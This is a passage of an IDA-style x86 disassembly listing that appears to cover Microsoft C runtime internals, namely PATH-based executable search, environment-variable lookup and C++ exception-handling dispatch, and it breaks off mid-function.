push 104h
call sub_422F79
mov esi, eax
pop ecx
test esi, esi
jz loc_428FE6
push ebx
mov ebx, 103h
push ebx
push esi
push edi
loc_428F04: ; CODE XREF: sub_428E88+151�j
call sub_42C9BF
add esp, 0Ch
mov [ebp+var_4], eax
test eax, eax
jz loc_428FDE
cmp byte ptr [esi], 0
jz loc_428FDE
push esi
call sub_422120
lea edi, [eax+esi-1]
pop ecx
mov al, [edi]
cmp al, 5Ch
jnz short loc_428F3F
push 5Ch
push esi
call sub_42C94D
pop ecx
cmp edi, eax
pop ecx
jmp short loc_428F41
; ---------------------------------------------------------------------------
loc_428F3F: ; CODE XREF: sub_428E88+A7�j
cmp al, 2Fh
loc_428F41: ; CODE XREF: sub_428E88+B5�j
jz short loc_428F50
push offset asc_43E8EC ; "\\"
push esi
call sub_423270
pop ecx
pop ecx
loc_428F50: ; CODE XREF: sub_428E88:loc_428F41�j
push esi
call sub_422120
push [ebp+arg_4]
mov edi, eax
call sub_422120
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_428FDE
push [ebp+arg_4]
push esi
call sub_423270
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push [ebp+arg_0]
call sub_428FED
add esp, 18h
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_428FDE
call sub_426528
cmp dword ptr [eax], 2
jz short loc_428FD4
push 5Ch
push esi
call sub_42CA33
pop ecx
cmp esi, eax
pop ecx
jz short loc_428FB5
push 2Fh
push esi
call sub_42CA33
pop ecx
cmp esi, eax
pop ecx
jnz short loc_428FDE
loc_428FB5: ; CODE XREF: sub_428E88+11D�j
lea edi, [esi+1]
push 5Ch
push edi
call sub_42CA33
pop ecx
cmp edi, eax
pop ecx
jz short loc_428FD4
push 2Fh
push edi
call sub_42CA33
pop ecx
cmp edi, eax
pop ecx
jnz short loc_428FDE
loc_428FD4: ; CODE XREF: sub_428E88+10F�j
; sub_428E88+13C�j
push ebx
push esi
push [ebp+var_4]
jmp loc_428F04
; ---------------------------------------------------------------------------
loc_428FDE: ; CODE XREF: sub_428E88+89�j
; sub_428E88+92�j ...
push esi
call sub_4230B3
pop ecx
pop ebx
loc_428FE6: ; CODE XREF: sub_428E88+21�j
; sub_428E88+2F�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
leave
retn
sub_428E88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428FED proc near ; CODE XREF: sub_423517+4F�p
; sub_428E88+13�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
push 5Ch
push ebx
mov edi, ebx
call sub_42C94D
push 2Fh
push ebx
mov esi, eax
call sub_42C94D
add esp, 10h
test eax, eax
jnz short loc_429058
test esi, esi
jnz short loc_429062
push 3Ah
push ebx
call sub_42CA33
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_429062
push ebx
call sub_422120
add eax, 3
push eax
call sub_422F79
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4290BB
push offset a__1 ; ".\\"
push edi
call sub_423260
push ebx
push edi
call sub_423270
add esp, 10h
lea esi, [edi+2]
jmp short loc_429062
; ---------------------------------------------------------------------------
loc_429058: ; CODE XREF: sub_428FED+24�j
test esi, esi
jz short loc_429060
cmp eax, esi
jbe short loc_429062
loc_429060: ; CODE XREF: sub_428FED+6D�j
mov esi, eax
loc_429062: ; CODE XREF: sub_428FED+28�j
; sub_428FED+38�j ...
or [ebp+var_8], 0FFFFFFFFh
push 2Eh
push esi
call sub_42C94D
pop ecx
test eax, eax
pop ecx
jz short loc_4290A1
push 0
push edi
call sub_424450
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_429123
push [ebp+arg_C]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_429136
add esp, 10h
mov [ebp+var_8], eax
jmp loc_429123
; ---------------------------------------------------------------------------
loc_4290A1: ; CODE XREF: sub_428FED+85�j
push edi
call sub_422120
add eax, 5
push eax
call sub_422F79
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
mov [ebp+var_4], ebx
jnz short loc_4290C0
loc_4290BB: ; CODE XREF: sub_428FED+4F�j
or eax, 0FFFFFFFFh
jmp short loc_429131
; ---------------------------------------------------------------------------
loc_4290C0: ; CODE XREF: sub_428FED+CC�j
push edi
push ebx
call sub_423260
push edi
call sub_422120
mov esi, eax
add esp, 0Ch
add esi, ebx
mov ebx, offset off_44BB84
loc_4290D9: ; CODE XREF: sub_428FED+10F�j
push dword ptr [ebx]
push esi
call sub_423260
push 0
push [ebp+var_4]
call sub_424450
add esp, 10h
cmp eax, 0FFFFFFFFh
jnz short loc_429100
sub ebx, 4
cmp ebx, offset off_44BB78
jge short loc_4290D9
jmp short loc_429117
; ---------------------------------------------------------------------------
loc_429100: ; CODE XREF: sub_428FED+104�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_4]
push [ebp+arg_0]
call sub_429136
add esp, 10h
mov [ebp+var_8], eax
loc_429117: ; CODE XREF: sub_428FED+111�j
push [ebp+var_4]
call sub_4230B3
mov ebx, [ebp+arg_4]
pop ecx
loc_429123: ; CODE XREF: sub_428FED+94�j
; sub_428FED+AF�j
cmp edi, ebx
jz short loc_42912E
push edi
call sub_4230B3
pop ecx
loc_42912E: ; CODE XREF: sub_428FED+138�j
mov eax, [ebp+var_8]
loc_429131: ; CODE XREF: sub_428FED+D1�j
pop edi
pop esi
pop ebx
leave
retn
sub_428FED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429136 proc near ; CODE XREF: sub_428FED+A4�p
; sub_428FED+11F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_4]
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_42CCB3
add esp, 14h
cmp eax, 0FFFFFFFFh
jnz short loc_42915B
or eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42915B: ; CODE XREF: sub_429136+1F�j
push esi
push [ebp+arg_8]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42CACA
push [ebp+arg_C]
mov esi, eax
call sub_4230B3
push [ebp+arg_8]
call sub_4230B3
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_429136 endp
; =============== S U B R O U T I N E =======================================
sub_429187 proc near ; CODE XREF: sub_423517+D�p
; sub_428E88+4E�p
arg_0 = dword ptr 4
push esi
push 0Ch
call sub_428436
push [esp+8+arg_0]
call sub_4291A8
push 0Ch
mov esi, eax
call sub_428497
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_429187 endp
; =============== S U B R O U T I N E =======================================
sub_4291A8 proc near ; CODE XREF: sub_429187+C�p
; sub_42D078+31�p
arg_0 = dword ptr 4
cmp dword_631990, 0
push ebx
push esi
mov esi, dword_631488
push edi
jz short loc_42921F
test esi, esi
jnz short loc_4291D9
cmp dword_631490, esi
jz short loc_42921F
call sub_42CEF8
test eax, eax
jnz short loc_42921F
mov esi, dword_631488
test esi, esi
jz short loc_42921F
loc_4291D9: ; CODE XREF: sub_4291A8+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_42921F
push ebx
call sub_422120
pop ecx
mov edi, eax
loc_4291EA: ; CODE XREF: sub_4291A8+6D�j
mov eax, [esi]
test eax, eax
jz short loc_42921F
push eax
call sub_422120
cmp eax, edi
pop ecx
jbe short loc_429212
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_429212
push edi
push ebx
push eax
call sub_42CEB9
add esp, 0Ch
test eax, eax
jz short loc_429217
loc_429212: ; CODE XREF: sub_4291A8+51�j
; sub_4291A8+59�j
add esi, 4
jmp short loc_4291EA
; ---------------------------------------------------------------------------
loc_429217: ; CODE XREF: sub_4291A8+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_429221
; ---------------------------------------------------------------------------
loc_42921F: ; CODE XREF: sub_4291A8+10�j
; sub_4291A8+1C�j ...
xor eax, eax
loc_429221: ; CODE XREF: sub_4291A8+75�j
pop edi
pop esi
pop ebx
retn
sub_4291A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429225 proc near ; CODE XREF: .text:00423742�p
; sub_4237AB+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_42923B
call sub_429AED
loc_42923B: ; CODE XREF: sub_429225+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_429263
cmp dword ptr [esi+4], 0
jz short loc_4292B9
cmp [ebp+arg_14], 0
jnz short loc_4292B9
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_42957A
add esp, 10h
jmp short loc_4292B9
; ---------------------------------------------------------------------------
loc_429263: ; CODE XREF: sub_429225+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_4292B9
cmp dword ptr [eax], 0E06D7363h
jnz short loc_42929D
cmp [eax+14h], edi
jbe short loc_42929D
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_42929D
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_4292BC
; ---------------------------------------------------------------------------
loc_42929D: ; CODE XREF: sub_429225+4A�j
; sub_429225+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_4292C0
add esp, 20h
loc_4292B9: ; CODE XREF: sub_429225+23�j
; sub_429225+29�j ...
push 1
pop eax
loc_4292BC: ; CODE XREF: sub_429225+76�j
pop edi
pop esi
pop ebp
retn
sub_429225 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4292C0 proc near ; CODE XREF: sub_429225+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_4292E0
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_4292E5
loc_4292E0: ; CODE XREF: sub_4292C0+16�j
call sub_429AED
loc_4292E5: ; CODE XREF: sub_4292C0+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_429448
cmp dword ptr [esi+10h], 3
jnz short loc_429365
cmp [esi+14h], edi
jnz short loc_429365
cmp dword ptr [esi+1Ch], 0
jnz short loc_429365
call sub_42599D
cmp dword ptr [eax+6Ch], 0
jz loc_429443
call sub_42599D
mov esi, [eax+6Ch]
call sub_42599D
mov eax, [eax+70h]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_42CF66
pop ecx
test eax, eax
pop ecx
jnz short loc_429347
call sub_429AED
loc_429347: ; CODE XREF: sub_4292C0+80�j
cmp [esi], ebx
jnz loc_429448
cmp dword ptr [esi+10h], 3
jnz short loc_429365
cmp [esi+14h], edi
jnz short loc_429365
cmp dword ptr [esi+1Ch], 0
jnz short loc_429365
call sub_429AED
loc_429365: ; CODE XREF: sub_4292C0+41�j
; sub_4292C0+46�j ...
cmp [esi], ebx
jnz loc_429448
cmp dword ptr [esi+10h], 3
jnz loc_429448
cmp [esi+14h], edi
jnz loc_429448
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_4238FB
add esp, 14h
mov ebx, eax
loc_42939C: ; CODE XREF: sub_4292C0+16E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_429433
cmp [ebx], edi
jg short loc_429428
cmp edi, [ebx+4]
jg short loc_429428
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_429425
loc_4293C1: ; CODE XREF: sub_4292C0+13D�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_4293F2
loc_4293D3: ; CODE XREF: sub_4292C0+130�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_42951D
add esp, 0Ch
test eax, eax
jnz short loc_429401
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_4293D3
loc_4293F2: ; CODE XREF: sub_4292C0+111�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_4293C1
jmp short loc_429425
; ---------------------------------------------------------------------------
loc_429401: ; CODE XREF: sub_4292C0+125�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_42962E
add esp, 2Ch
loc_429425: ; CODE XREF: sub_4292C0+FF�j
; sub_4292C0+13F�j
mov edi, [ebp+var_10]
loc_429428: ; CODE XREF: sub_4292C0+EA�j
; sub_4292C0+EF�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_42939C
; ---------------------------------------------------------------------------
loc_429433: ; CODE XREF: sub_4292C0+E2�j
cmp [ebp+arg_14], 0
jz short loc_429443
push 1
push esi
call sub_4299B2
pop ecx
pop ecx
loc_429443: ; CODE XREF: sub_4292C0+57�j
; sub_4292C0+177�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_429448: ; CODE XREF: sub_4292C0+37�j
; sub_4292C0+89�j ...
cmp [ebp+arg_14], 0
jnz short loc_42946E
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_429473
add esp, 20h
jmp short loc_429443
; ---------------------------------------------------------------------------
loc_42946E: ; CODE XREF: sub_4292C0+18C�j
jmp sub_429A8C
sub_4292C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429473 proc near ; CODE XREF: sub_4292C0+1A4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call sub_42599D
cmp dword ptr [eax+68h], 0
jz short loc_4294A6
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4237D0
add esp, 1Ch
test eax, eax
jnz short loc_429519
loc_4294A6: ; CODE XREF: sub_429473+10�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_4238FB
add esp, 14h
mov esi, eax
loc_4294C2: ; CODE XREF: sub_429473+A4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_429519
cmp edi, [esi]
jl short loc_429511
cmp edi, [esi+4]
jg short loc_429511
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_4294EB
cmp byte ptr [ecx+8], 0
jnz short loc_429511
loc_4294EB: ; CODE XREF: sub_429473+70�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42962E
add esp, 2Ch
loc_429511: ; CODE XREF: sub_429473+59�j
; sub_429473+5E�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_4294C2
; ---------------------------------------------------------------------------
loc_429519: ; CODE XREF: sub_429473+31�j
; sub_429473+55�j
pop edi
pop esi
leave
retn
sub_429473 endp
; =============== S U B R O U T I N E =======================================
sub_42951D proc near ; CODE XREF: sub_4292C0+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_429574
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_429574
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_42954E
add ecx, 8
push ecx
push edx
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_429570
loc_42954E: ; CODE XREF: sub_42951D+1F�j
test byte ptr [esi], 2
jz short loc_429558
test byte ptr [edi], 8
jz short loc_429570
loc_429558: ; CODE XREF: sub_42951D+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_429567
test byte ptr [edi], 1
jz short loc_429570
loc_429567: ; CODE XREF: sub_42951D+43�j
test al, 2
jz short loc_429574
test byte ptr [edi], 2
jnz short loc_429574
loc_429570: ; CODE XREF: sub_42951D+2F�j
; sub_42951D+39�j ...
xor eax, eax
jmp short loc_429577
; ---------------------------------------------------------------------------
loc_429574: ; CODE XREF: sub_42951D+B�j
; sub_42951D+14�j ...
push 1
pop eax
loc_429577: ; CODE XREF: sub_42951D+55�j
pop edi
pop esi
retn
sub_42951D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42957A proc near ; CODE XREF: sub_429225+34�p
; sub_42962E+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F5A8
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_4295AC: ; CODE XREF: sub_42957A+8A�j
cmp esi, [ebp+arg_C]
jz short loc_429606
cmp esi, 0FFFFFFFFh
jle short loc_4295BB
cmp esi, [edi+4]
jl short loc_4295C0
loc_4295BB: ; CODE XREF: sub_42957A+3A�j
call sub_429AED
loc_4295C0: ; CODE XREF: sub_42957A+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_4295DB
push 103h
push ebx
push eax
call sub_429A40
loc_4295DB: ; CODE XREF: sub_42957A+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4295FB
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_429618
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_4295FB: ; CODE XREF: sub_42957A+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_4295AC
; ---------------------------------------------------------------------------
loc_429606: ; CODE XREF: sub_42957A+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_42957A endp
; =============== S U B R O U T I N E =======================================
sub_429618 proc near ; CODE XREF: sub_42957A+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_429629
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_429629: ; CODE XREF: sub_429618+C�j
jmp sub_429A8C
sub_429618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42962E proc near ; CODE XREF: sub_4292C0+15D�p
; sub_429473+96�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_429650
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_4297EE
add esp, 10h
loc_429650: ; CODE XREF: sub_42962E+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_42965C
push edi
jmp short loc_42965F
; ---------------------------------------------------------------------------
loc_42965C: ; CODE XREF: sub_42962E+29�j
push [ebp+arg_24]
loc_42965F: ; CODE XREF: sub_42962E+2C�j
call sub_4236D2
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_42957A
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_4296A9
add esp, 2Ch
test eax, eax
jz short loc_4296A4
push edi
push eax
call sub_423690
loc_4296A4: ; CODE XREF: sub_42962E+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42962E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4296A9 proc near ; CODE XREF: sub_42962E+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F5B8
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_10]
mov [ebp+var_2C], ebx
and [ebp+var_24], 0
mov esi, [ebp+arg_4]
mov eax, [esi-4]
mov [ebp+var_28], eax
call sub_42599D
mov eax, [eax+6Ch]
mov [ebp+var_1C], eax
call sub_42599D
mov eax, [eax+70h]
mov [ebp+var_20], eax
call sub_42599D
mov edi, [ebp+arg_0]
mov [eax+6Ch], edi
call sub_42599D
mov ecx, [ebp+arg_8]
mov [eax+70h], ecx
and [ebp+var_4], 0
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push ebx
push [ebp+arg_C]
push esi
call sub_423757
add esp, 14h
mov [ebp+var_2C], eax
and [ebp+var_4], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_429776
mov eax, [ebp+var_2C]
loc_42973F: ; CODE XREF: sub_429758+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4296A9 endp
; =============== S U B R O U T I N E =======================================
sub_42974E proc near ; DATA XREF: .text:0042F5C8�o
push dword ptr [ebp-14h]
call sub_4297C4
pop ecx
retn
sub_42974E endp
; =============== S U B R O U T I N E =======================================
sub_429758 proc near ; DATA XREF: .text:0042F5CC�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_4239BA
pop ecx
pop ecx
xor eax, eax
jmp short loc_42973F
sub_429758 endp
; ---------------------------------------------------------------------------
loc_429770: ; DATA XREF: .text:0042F5C0�o
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_429776 proc near ; CODE XREF: sub_4296A9+8E�p
mov eax, [ebp-28h]
mov [esi-4], eax
call sub_42599D
mov ecx, [ebp-1Ch]
mov [eax+6Ch], ecx
call sub_42599D
mov ecx, [ebp-20h]
mov [eax+70h], ecx
cmp dword ptr [edi], 0E06D7363h
jnz short locret_4297C3
cmp dword ptr [edi+10h], 3
jnz short locret_4297C3
cmp dword ptr [edi+14h], 19930520h
jnz short locret_4297C3
cmp dword ptr [ebp-24h], 0
jnz short locret_4297C3
cmp dword ptr [ebp-2Ch], 0
jz short locret_4297C3
call sub_423A22
push eax
push edi
call sub_4299B2
pop ecx
pop ecx
locret_4297C3: ; CODE XREF: sub_429776+22�j
; sub_429776+28�j ...
retn
sub_429776 endp
; =============== S U B R O U T I N E =======================================
sub_4297C4 proc near ; CODE XREF: sub_42974E+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4297EB
cmp dword ptr [eax+10h], 3
jnz short loc_4297EB
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4297EB
cmp dword ptr [eax+1Ch], 0
jnz short loc_4297EB
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4297EB: ; CODE XREF: sub_4297C4+C�j
; sub_4297C4+12�j ...
xor eax, eax
retn
sub_4297C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4297EE proc near ; CODE XREF: sub_42962E+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F5D0
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_429997
cmp byte ptr [eax+8], 0
jz loc_429997
mov eax, [ecx+8]
test eax, eax
jz loc_429997
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_42988B
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_42CF66
pop ecx
pop ecx
test eax, eax
jz loc_42998E
push 1
push edi
call sub_42CF82
pop ecx
pop ecx
test eax, eax
jz loc_42998E
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_42987C: ; CODE XREF: sub_4297EE+F5�j
push eax
call sub_429A19
pop ecx
pop ecx
mov [edi], eax
jmp loc_429993
; ---------------------------------------------------------------------------
loc_42988B: ; CODE XREF: sub_4297EE+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_4298E5
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_42CF66
pop ecx
pop ecx
test eax, eax
jz loc_42998E
push 1
push edi
call sub_42CF82
pop ecx
pop ecx
test eax, eax
jz loc_42998E
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_423C20
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_429993
mov eax, [edi]
test eax, eax
jz loc_429993
add esi, 8
push esi
jmp short loc_42987C
; ---------------------------------------------------------------------------
loc_4298E5: ; CODE XREF: sub_4297EE+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_42992D
call sub_42CF66
pop ecx
pop ecx
test eax, eax
jz loc_42998E
push 1
push edi
call sub_42CF82
pop ecx
pop ecx
test eax, eax
jz short loc_42998E
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_429A19
pop ecx
pop ecx
push eax
push edi
call sub_423C20
add esp, 0Ch
jmp short loc_429993
; ---------------------------------------------------------------------------
loc_42992D: ; CODE XREF: sub_4297EE+103�j
call sub_42CF66
pop ecx
pop ecx
test eax, eax
jz short loc_42998E
push 1
push edi
call sub_42CF82
pop ecx
pop ecx
test eax, eax
jz short loc_42998E
push dword ptr [esi+18h]
call sub_42CF9E
pop ecx
test eax, eax
jz short loc_42998E
test byte ptr [esi], 4
jz short loc_429974
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_429A19
pop ecx
pop ecx
push eax
